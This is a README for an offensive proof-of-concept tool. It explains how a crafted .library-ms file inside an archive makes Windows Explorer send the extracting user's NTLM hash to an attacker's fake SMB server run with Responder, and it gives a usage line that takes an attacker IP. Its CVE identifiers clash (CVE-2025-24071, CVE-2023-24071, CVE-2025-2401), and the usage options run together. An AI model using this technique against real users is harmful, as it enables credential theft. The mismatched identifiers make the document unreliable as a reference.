PoCs/CVE-2025-24071/README.md

CVE-2023-24071 - Windows Explorer NTLM Hash Disclosure

This exploit abuses the way Windows Explorer handles library files that have been extracted from an archive (.zip, .rar, etc.). When an archive containing a library is decompressed, Explorer will automatically attempt a connection to the URL specified in the library.

This means that we can set up responder and listen for a connection back to our fake SMB server, disclosing the hash of the user who extracted the archive.

User interaction is required as the archive file must be opened for the connection to be made.

Usage

CVE-2025-2401.py -s <attacker IP/domain> -f -l Renames the library file (default mal.library-ms)

License

GPL v3.0 - as all good software should be

Only with explicit permission from the target system owner.

Remember - don't be a skid :)